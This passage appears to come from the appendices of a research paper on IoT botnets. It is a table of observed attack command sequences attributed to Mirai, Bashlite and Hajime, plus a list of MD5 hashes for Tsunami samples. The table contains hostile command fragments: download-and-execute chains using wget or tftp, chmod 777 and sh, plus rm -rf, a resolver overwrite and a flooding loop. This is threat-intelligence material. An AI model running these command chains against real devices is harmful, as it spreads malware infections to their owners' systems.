| 15 | (2) | 12 | (dd bs=52 count=1 if=.s \|\| cat .s), (dd bs=52 count=1 if=.s \|\| cat .s), | Hajime | 2 |
| 16 | 4080 | 11 | cd /tmp \|\| cd /var/run \|\| cd /dev/shm \|\| cd /mnt \|\| cd /var | Bashlite | 1 |
| 17 | 3017 | 10 | cd /tmp \|\| cd /var/run \|\| cd /dev/shm \|\| cd /mnt \|\| cd /var | Bashlite | 1 |
| 18 | (4) | 9 | cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /, wget/tftp/get/ftpget, chmod, sh, rm | Bashlite | 4 |
| 19 | 916 | 27 | busybox echo \|\| echo nameserver 8.8.8.8 > /etc/resolv.conf, cd /var \|\| cd /tmp \|\| cd /var/run \|\| cd /var/tmp \|\| cd /dev \|\| cd /dev/shm \|\| cd /mnt \|\| cd /boot \|\| cd /usr \|\| cd /dev/netslink | Bashlite | 1 |
| 20 | (3) | 8 | sh \|\| bash \|\| shell, cd /tmp \|\| cd /var/run \|\| cd /dev/shm \|\| cd /mnt \|\| cd /var | Bashlite | 3 |
| 21 | (2) | 6 | cd /tmp; wget \|\| curl -O ; chmod 777 ; sh | Bashlite | 2 |
| 22 | 3703 | 7 | cd /tmp; wget \|\| curl -O ; chmod 777 ; sh | Bashlite | 1 |
| 23 | (3) | 3 | sh, shell, help, busybox, wget | Mirai | 3 |
| 24 | 2520 | 4 | sh, shell, help, busybox, wget/ tftp ; chmod 777 ; sh \|\| bash ; rm -rf ; | Mirai | 1 |
| 25 | 2896 | 5 | sh, shell, help, busybox, wget/ tftp ; chmod 777 ; sh \|\| bash ; rm -rf ; | Mirai | 1 |
| 26 | (5) | 2 | chmod a+x 7up;./7up., system., /bin/busybox Mirai. | Mirai variant | 5 |
| 27 | 726 | 28 | cd /tmp, wget/tftp/get/ftpget, chmod, sh, rm | Bashlite | 1 |
| 28 | 3921 | 29 | busybox wget \|\| wget [url] \|\| tftp [url]; sh | Bashlite | 1 |
| 29 | (934) | 1 | killall wget; killall ping; killall sh while true; do wget -O /dev/null [url] > /dev/null 2> | Unknown | 934 |
| 30 | 325 | 30 | /bin/busybox MIRAI., cd /var/tmp ;cd /tmp; rm -f *; ftpget, sh & | Mirai | 1 |

Appendix B The MD5 of malware Tsunami (April 2017, Feature ID 3 of Appendix A)

MD5

10f045aa890077adc300ea79686eefba

1920b61e9c1e001e2c651bc9ffd59b1a

196dfd58285222b20d6d3434645114e2

25060f2d2d53e80bf01e77ccbabab077

305f120d4893c293faeb368c31ab0913

4312ad5c366a7e500d23883617db8ead

4e9f282659dcc1cd3e9aa9df69d1f9ae

55e1a814fc007a7ac145d8a1f112da9e


571c52660cb9f6f0f3f17f25e871251f

6fae1bce8953e9e16b0fd12361690d23

6ff6033745023abb23277df7de2ae69b

71b3589cd99aa176abd68f647d69bbe7

cd3e728914ba6917911423893d95a75a

cea45d9ad8b5339dbc34bb9d072785f0

d78438bcc89b4ecb62bc089ee4691cb0

d8d5807d12eb2acbdff7eb893b87364f

db2e7c2234302e9db0c47b0891104074

dd900a26248a1d01a3b0cf1c65e8bc44

dd90f88f4028e710da9649d370fda93b

de2569ffa1765d9203397b6b7728358b

f1599964e69bc3d0639a47b38badcdf6

f2f49696f944e793daf73e4de9c67c54

f6c3613139f0f36fa93e88c0ecc13a25